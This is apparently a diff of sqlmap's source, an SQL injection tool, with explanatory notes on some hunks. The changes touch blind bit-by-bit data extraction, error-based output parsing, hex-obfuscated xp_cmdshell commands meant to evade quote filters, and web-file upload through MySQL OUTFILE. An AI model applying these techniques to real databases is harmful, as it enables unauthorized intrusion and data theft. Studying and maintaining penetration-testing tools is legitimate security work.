forgeCaseExpression = booleanExpression = expression
|
||||
|
||||
if expression.upper().startswith("SELECT "):
|
||||
if expression.startswith("SELECT "):
|
||||
booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1")
|
||||
else:
|
||||
forgeCaseExpression = agent.forgeCaseStatement(expression)
|
||||
@@ -414,7 +418,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||
|
||||
if found and conf.dnsDomain:
|
||||
_ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items())))
|
||||
_ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items())))
|
||||
warnMsg = "option '--dns-domain' will be ignored "
|
||||
warnMsg += "as faster techniques are usable "
|
||||
warnMsg += "(%s) " % _
|
||||
|
||||
@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
import time
|
||||
import types
|
||||
import urllib2
|
||||
import urlparse
|
||||
@@ -69,6 +70,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||
return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host())
|
||||
|
||||
def http_error_302(self, req, fp, code, msg, headers):
|
||||
start = time.time()
|
||||
content = None
|
||||
redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None
|
||||
|
||||
@@ -92,18 +94,18 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||
threadData.lastRedirectMsg = (threadData.lastRequestUID, content)
|
||||
|
||||
redirectMsg = "HTTP redirect "
|
||||
redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg))
|
||||
redirectMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, getUnicode(msg))
|
||||
|
||||
if headers:
|
||||
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items())
|
||||
logHeaders = "\r\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items())
|
||||
else:
|
||||
logHeaders = ""
|
||||
|
||||
redirectMsg += logHeaders
|
||||
if content:
|
||||
redirectMsg += "\n\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
redirectMsg += "\r\n\r\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
|
||||
logHTTPTraffic(threadData.lastRequestMsg, redirectMsg)
|
||||
logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time())
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)
|
||||
|
||||
if redurl:
|
||||
@@ -127,7 +129,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
if HTTP_HEADER.COOKIE not in req.headers:
req.headers[HTTP_HEADER.COOKIE] = _
else:
req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (_.split('=')[0], delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (re.escape(_.split('=')[0]), delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
try:
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
except urllib2.HTTPError, e:
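The one-line change above wraps the cookie name in `re.escape()` before using it inside the removal regex, so names containing regex metacharacters cannot break or over-match the substitution. A small sketch of that merge step (function and defaults are assumptions for illustration):

```python
# Sketch of merging a new cookie into an existing Cookie header; the point of
# the fix above is the re.escape() around the cookie name used in the regex.
import re

def merge_cookie(header, fresh, delimiter="; "):
    name = fresh.split('=')[0]
    # Drop any previous value of the same cookie (name is escaped, so names
    # like "a.b" or "x[0]" are treated literally rather than as regex syntax)
    cleaned = re.sub(r"\b%s=[^;]*(%s)?" % (re.escape(name), re.escape(delimiter)), "", header)
    merged = (cleaned.rstrip("; ") + delimiter + fresh).strip(delimiter.strip())
    return re.sub(r"(%s){2,}" % re.escape(delimiter), delimiter, merged).strip()

print(merge_cookie("PHPSESSID=old; lang=en", "PHPSESSID=new"))  # lang=en; PHPSESSID=new
```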
@@ -13,7 +13,7 @@ def getPageTemplate(payload, place):
|
||||
|
||||
if payload and place:
|
||||
if (payload, place) not in kb.pageTemplates:
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)
|
||||
|
||||
retVal = kb.pageTemplates[(payload, place)]
|
||||
|
||||
@@ -80,12 +80,12 @@ class Abstraction(Web, UDF, XP_cmdshell):
|
||||
if not self.alwaysRetrieveCmdOutput:
|
||||
message = "do you want to retrieve the command standard "
|
||||
message += "output? [Y/n/a] "
|
||||
choice = readInput(message, default='Y')
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice in ('a', 'A'):
|
||||
if choice == 'A':
|
||||
self.alwaysRetrieveCmdOutput = True
|
||||
|
||||
if not choice or choice in ('y', 'Y') or self.alwaysRetrieveCmdOutput:
|
||||
if choice == 'Y' or self.alwaysRetrieveCmdOutput:
|
||||
output = self.evalCmd(cmd)
|
||||
|
||||
if output:
|
||||
@@ -189,7 +189,7 @@ class Abstraction(Web, UDF, XP_cmdshell):
|
||||
|
||||
if mandatory and not self.isDba():
|
||||
warnMsg = "functionality requested probably does not work because "
|
||||
warnMsg += "the curent session user is not a database administrator"
|
||||
warnMsg += "the current session user is not a database administrator"
|
||||
|
||||
if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
|
||||
warnMsg += ". You can try to use option '--dbms-cred' "
|
||||
|
||||
@@ -195,7 +195,7 @@ class UDF:
|
||||
|
||||
if not self.isDba():
|
||||
warnMsg = "functionality requested probably does not work because "
|
||||
warnMsg += "the curent session user is not a database administrator"
|
||||
warnMsg += "the current session user is not a database administrator"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not conf.shLib:
|
||||
|
||||
@@ -144,7 +144,7 @@ class Web:
|
||||
randInt = randomInt()
|
||||
query += "OR %d=%d " % (randInt, randInt)
|
||||
|
||||
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
|
||||
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding))
|
||||
query = agent.prefixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
@@ -207,7 +207,7 @@ class Web:
|
||||
headers = {}
|
||||
been = set([conf.url])
|
||||
|
||||
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I):
|
||||
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
|
||||
url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
|
||||
if url not in been:
|
||||
try:
|
||||
@@ -232,7 +232,7 @@ class Web:
|
||||
if place in conf.parameters:
|
||||
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
|
||||
if "[]" in value:
|
||||
page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
cookie = None
|
||||
@@ -244,12 +244,12 @@ class Web:
|
||||
if cookie:
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
directories = list(arrayizeValue(getManualDirectories()))
|
||||
|
||||
@@ -163,7 +163,7 @@ class XP_cmdshell:
|
||||
# Obfuscate the command to execute, also useful to bypass filters
|
||||
# on single-quotes
|
||||
self._randStr = randomStr(lowercase=True)
|
||||
self._cmd = "0x%s" % hexencode(cmd)
|
||||
self._cmd = "0x%s" % hexencode(cmd, conf.encoding)
|
||||
self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr
|
||||
self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd)
|
||||
|
||||
|
||||
@@ -39,7 +39,9 @@ from lib.core.settings import CHAR_INFERENCE_MARK
from lib.core.settings import INFERENCE_BLANK_BREAK
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_GREATER_EQUALS_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_MARKER
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MAX_BISECTION_LENGTH
from lib.core.settings import MAX_REVALIDATION_STEPS
@@ -67,7 +69,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
partialValue = u""
finalValue = None
retrievedLength = 0
asciiTbl = getCharset(charsetType)
if charsetType is None and conf.charset:
asciiTbl = sorted(set(ord(_) for _ in conf.charset))
else:
asciiTbl = getCharset(charsetType)
threadData = getCurrentThreadData()
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
retVal = hashDBRetrieve(expression, checkConf=True)
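The change above lets a user-supplied `--charset` override the default inference table: the string is turned into a sorted, de-duplicated list of code points that the bisection then halves on each request. A minimal illustration, assuming a plain hexadecimal charset:

```python
# Minimal illustration of building the inference table from a custom charset:
# unique code points, sorted so that bisection can halve the range.
custom_charset = "0123456789abcdef"   # e.g. value passed via --charset
ascii_tbl = sorted(set(ord(c) for c in custom_charset))
print(ascii_tbl)       # [48, 49, ..., 57, 97, ..., 102]
print(len(ascii_tbl))  # 16
```

With 16 candidate code points each character costs at most 4 comparison requests (log2 of 16), versus roughly 7 for a table covering the full printable range, which is the practical payoff of narrowing the charset.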
@@ -109,7 +116,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
elif (kb.fileReadMode or dump) and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())):
|
||||
firstChar = int(conf.firstChar) - 1
|
||||
if kb.fileReadMode:
|
||||
firstChar *= 2
|
||||
firstChar <<= 1
|
||||
elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int):
|
||||
firstChar = int(firstChar) - 1
|
||||
else:
|
||||
@@ -187,8 +194,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
else:
|
||||
posValue = ord(hintValue[idx - 1])
|
||||
|
||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
forgedPayload = agent.extractPayload(payload)
|
||||
forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
|
||||
result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
if result:
|
||||
@@ -270,86 +278,86 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
lastCheck = False
|
||||
unexpectedCode = False
|
||||
|
||||
while len(charTbl) != 1:
|
||||
position = None
|
||||
if continuousOrder:
|
||||
while len(charTbl) > 1:
|
||||
position = None
|
||||
|
||||
if charsetType is None:
|
||||
if not firstCheck:
|
||||
try:
|
||||
if charsetType is None:
|
||||
if not firstCheck:
|
||||
try:
|
||||
lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
|
||||
except IndexError:
|
||||
lastChar = None
|
||||
if 'a' <= lastChar <= 'z':
|
||||
position = charTbl.index(ord('a') - 1) # 96
|
||||
elif 'A' <= lastChar <= 'Z':
|
||||
position = charTbl.index(ord('A') - 1) # 64
|
||||
elif '0' <= lastChar <= '9':
|
||||
position = charTbl.index(ord('0') - 1) # 47
|
||||
except ValueError:
|
||||
pass
|
||||
finally:
|
||||
firstCheck = True
|
||||
|
||||
elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
|
||||
if charTbl[(len(charTbl) >> 1)] < ord(' '):
|
||||
try:
|
||||
# favorize last char check if current value inclines toward 0
|
||||
position = charTbl.index(1)
|
||||
try:
|
||||
lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
|
||||
except IndexError:
|
||||
lastChar = None
|
||||
if 'a' <= lastChar <= 'z':
|
||||
position = charTbl.index(ord('a') - 1) # 96
|
||||
elif 'A' <= lastChar <= 'Z':
|
||||
position = charTbl.index(ord('A') - 1) # 64
|
||||
elif '0' <= lastChar <= '9':
|
||||
position = charTbl.index(ord('0') - 1) # 47
|
||||
except ValueError:
|
||||
pass
|
||||
finally:
|
||||
lastCheck = True
|
||||
firstCheck = True
|
||||
|
||||
if position is None:
|
||||
position = (len(charTbl) >> 1)
|
||||
elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
|
||||
if charTbl[(len(charTbl) >> 1)] < ord(' '):
|
||||
try:
|
||||
# favorize last char check if current value inclines toward 0
|
||||
position = charTbl.index(1)
|
||||
except ValueError:
|
||||
pass
|
||||
finally:
|
||||
lastCheck = True
|
||||
|
||||
posValue = charTbl[position]
|
||||
falsePayload = None
|
||||
if position is None:
|
||||
position = (len(charTbl) >> 1)
|
||||
|
||||
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER))
|
||||
else:
|
||||
# e.g.: ... > '%c' -> ... > ORD(..)
|
||||
markingValue = "'%s'" % CHAR_INFERENCE_MARK
|
||||
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue))
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL)
|
||||
posValue = charTbl[position]
|
||||
falsePayload = None
|
||||
|
||||
if timeBasedCompare:
|
||||
if kb.responseTimeMode:
|
||||
kb.responseTimePayload = falsePayload
|
||||
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER))
|
||||
else:
|
||||
kb.responseTimePayload = None
|
||||
# e.g.: ... > '%c' -> ... > ORD(..)
|
||||
markingValue = "'%s'" % CHAR_INFERENCE_MARK
|
||||
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue))
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL)
|
||||
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
if timeBasedCompare:
|
||||
if kb.responseTimeMode:
|
||||
kb.responseTimePayload = falsePayload
|
||||
else:
|
||||
kb.responseTimePayload = None
|
||||
|
||||
if not timeBasedCompare:
|
||||
unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
|
||||
if unexpectedCode:
|
||||
warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
if result:
|
||||
minValue = posValue
|
||||
if not timeBasedCompare:
|
||||
unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
|
||||
if unexpectedCode:
|
||||
warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[position:]
|
||||
if result:
|
||||
minValue = posValue
|
||||
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[position:]
|
||||
else:
|
||||
# xrange() - extended virtual charset used for memory/space optimization
|
||||
charTbl = xrange(charTbl[position], charTbl[-1] + 1)
|
||||
else:
|
||||
# xrange() - extended virtual charset used for memory/space optimization
|
||||
charTbl = xrange(charTbl[position], charTbl[-1] + 1)
|
||||
else:
|
||||
maxValue = posValue
|
||||
maxValue = posValue
|
||||
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[:position]
|
||||
else:
|
||||
charTbl = xrange(charTbl[0], charTbl[position])
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[:position]
|
||||
else:
|
||||
charTbl = xrange(charTbl[0], charTbl[position])
|
||||
|
||||
if len(charTbl) == 1:
|
||||
if continuousOrder:
|
||||
if len(charTbl) == 1:
|
||||
if maxValue == 1:
|
||||
return None
|
||||
|
||||
@@ -408,25 +416,40 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
return decodeIntToUnicode(retVal)
else:
return None
else:
candidates = list(originalTbl)
bit = 0
while len(candidates) > 1:
bits = {}
for candidate in candidates:
bit = 0
while candidate:
bits.setdefault(bit, 0)
bits[bit] += 1 if candidate & 1 else -1
candidate >>= 1
bit += 1
choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0]
mask = 1 << choice
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0))
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
if result:
candidates = [_ for _ in candidates if _ & mask > 0]
else:
if minValue == maxChar or maxValue == minChar:
return None
candidates = [_ for _ in candidates if _ & mask == 0]
for index in xrange(len(originalTbl)):
if originalTbl[index] == minValue:
break
bit += 1
# If we are working with non-continuous elements, both minValue and character after
# are possible candidates
for retVal in (originalTbl[index], originalTbl[index + 1]):
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal))
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
if candidates:
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0]))
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
if result:
return decodeIntToUnicode(retVal)
return None
if result:
return decodeIntToUnicode(candidates[0])
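The replacement branch above handles non-continuous charsets: instead of positional bisection it repeatedly asks the target about one bit of the character code, choosing the bit that splits the remaining candidate set most evenly (the sort by `abs()` of the tally), and keeps only the candidates that agree with the answer. A standalone sketch of that narrowing loop, with a mock oracle standing in for the injected `Request.queryPage()` call:

```python
# Standalone sketch of the bit-splitting search used for non-continuous charsets.
# `oracle(mask)` stands in for the injected "(code & mask) > 0" request.
def narrow_candidates(candidates, oracle):
    candidates = list(candidates)
    while len(candidates) > 1:
        # Tally how unevenly each bit splits the remaining candidates
        balance = {}
        for candidate in candidates:
            bit = 0
            while candidate:
                balance[bit] = balance.get(bit, 0) + (1 if candidate & 1 else -1)
                candidate >>= 1
                bit += 1
        # The most balanced bit (smallest |#ones - #zeros|) halves the set fastest
        bit = sorted(balance.items(), key=lambda item: abs(item[1]))[0][0]
        mask = 1 << bit
        if oracle(mask):
            candidates = [c for c in candidates if c & mask]
        else:
            candidates = [c for c in candidates if not c & mask]
    return candidates[0] if candidates else None

secret = ord('7')
guess = narrow_candidates([ord(c) for c in "0123456789abcdef"], lambda mask: bool(secret & mask))
print(chr(guess))  # 7
```

In the hunk itself the `&%d` mask test is spliced into the existing inference payload by rewriting the `>` comparison, and a final equality request confirms the single surviving candidate.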
# Go multi-threading (--threads > 1)
|
||||
if conf.threads > 1 and isinstance(length, int) and length > 1:
|
||||
@@ -443,23 +466,22 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
|
||||
if threadData.shared.index[0] - firstChar >= length:
|
||||
kb.locks.index.release()
|
||||
|
||||
return
|
||||
|
||||
threadData.shared.index[0] += 1
|
||||
curidx = threadData.shared.index[0]
|
||||
currentCharIndex = threadData.shared.index[0]
|
||||
kb.locks.index.release()
|
||||
|
||||
if kb.threadContinue:
|
||||
charStart = time.time()
|
||||
val = getChar(curidx)
|
||||
val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset))
|
||||
if val is None:
|
||||
val = INFERENCE_UNKNOWN_CHAR
|
||||
else:
|
||||
break
|
||||
|
||||
with kb.locks.value:
|
||||
threadData.shared.value[curidx - 1 - firstChar] = val
|
||||
threadData.shared.value[currentCharIndex - 1 - firstChar] = val
|
||||
currentValue = list(threadData.shared.value)
|
||||
|
||||
if kb.threadContinue:
|
||||
@@ -487,15 +509,15 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
count += 1 if currentValue[i] is not None else 0
|
||||
|
||||
if startCharIndex > 0:
|
||||
output = '..' + output[2:]
|
||||
output = ".." + output[2:]
|
||||
|
||||
if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1):
|
||||
output = output[:-2] + '..'
|
||||
output = output[:-2] + ".."
|
||||
|
||||
if conf.verbose in (1, 2) and not showEta and not conf.api:
|
||||
_ = count - firstChar
|
||||
output += '_' * (min(length, conf.progressWidth) - len(output))
|
||||
status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length))
|
||||
status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length))
|
||||
output += status if _ != length else " " * len(status)
|
||||
|
||||
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output)))
|
||||
@@ -548,7 +570,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False)
|
||||
|
||||
query = kb.injection.data[kb.technique].vector
|
||||
query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (expressionUnescaped, testValue)))
|
||||
query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)%s%s" % (expressionUnescaped, INFERENCE_EQUALS_CHAR, testValue)))
|
||||
query = agent.suffixQuery(query)
|
||||
|
||||
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
@@ -572,7 +594,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False)
|
||||
|
||||
query = kb.injection.data[kb.technique].vector
|
||||
query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (subquery, testValue)))
|
||||
query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)=%s" % (subquery, testValue)))
|
||||
query = agent.suffixQuery(query)
|
||||
|
||||
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
@@ -593,9 +615,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
# If we had no luck with commonValue and common charset,
|
||||
# use the returned other charset
|
||||
if not val:
|
||||
val = getChar(index, otherCharset, otherCharset == asciiTbl)
|
||||
val = getChar(index, otherCharset, otherCharset==asciiTbl)
|
||||
else:
|
||||
val = getChar(index, asciiTbl)
|
||||
val = getChar(index, asciiTbl, not(charsetType is None and conf.charset))
|
||||
|
||||
if val is None:
|
||||
finalValue = partialValue
|
||||
|
||||
@@ -28,6 +28,7 @@ from lib.core.common import isNumPosStrValue
|
||||
from lib.core.common import listToStrValue
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.core.common import wasLastResponseHTTPError
|
||||
from lib.core.convert import hexdecode
|
||||
from lib.core.convert import htmlunescape
|
||||
from lib.core.data import conf
|
||||
@@ -97,8 +98,8 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
if retVal is None or partialValue:
try:
while True:
check = r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
trimcheck = r"%s(?P<result>[^<\n]*)" % (kb.chars.start)
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
trimcheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
if field:
nulledCastedField = agent.nullAndCastField(field)
@@ -120,7 +121,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
payload = agent.payload(newValue=injExpression)
# Perform the request
page, headers = Request.queryPage(payload, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
incrementCounter(kb.technique)
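The regex tweak above moves the DOTALL and IGNORECASE flags inline as `(?si)` in the `check`/`trimcheck` patterns that pull the error-based output from between per-run start/stop markers. A short sketch of that delimit-and-extract step, with made-up marker strings (sqlmap derives its own markers at runtime):

```python
# Sketch of extracting error-based output delimited by start/stop markers
# (marker strings here are made up; sqlmap derives its own per run).
import re

START, STOP = ":abc:", ":def:"

def extract(page):
    # (?si) -> DOTALL + IGNORECASE inline, matching the `check` pattern above
    match = re.search(r"(?si)%s(?P<result>.*?)%s" % (re.escape(START), re.escape(STOP)), page or "")
    return match.group("result") if match else None

error_page = "XPATH syntax error: ':abc:admin\n:def:'"
print(extract(error_page))  # admin (plus the trailing newline kept by DOTALL)
```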
@@ -130,23 +131,19 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
# Parse the returned page to get the exact error-based
|
||||
# SQL injection output
|
||||
output = reduce(lambda x, y: x if x is not None else y, (\
|
||||
extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \
|
||||
extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \
|
||||
if headers else None), re.DOTALL | re.IGNORECASE), \
|
||||
extractRegexResult(check, threadData.lastRedirectMsg[1] \
|
||||
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
||||
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \
|
||||
extractRegexResult(check, page), \
|
||||
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \
|
||||
extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)), \
|
||||
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \
|
||||
None)
|
||||
|
||||
if output is not None:
|
||||
output = getUnicode(output)
|
||||
else:
|
||||
trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \
|
||||
if headers else None), re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \
|
||||
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
||||
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||
trimmed = extractRegexResult(trimcheck, page) \
|
||||
or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \
|
||||
or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)) \
|
||||
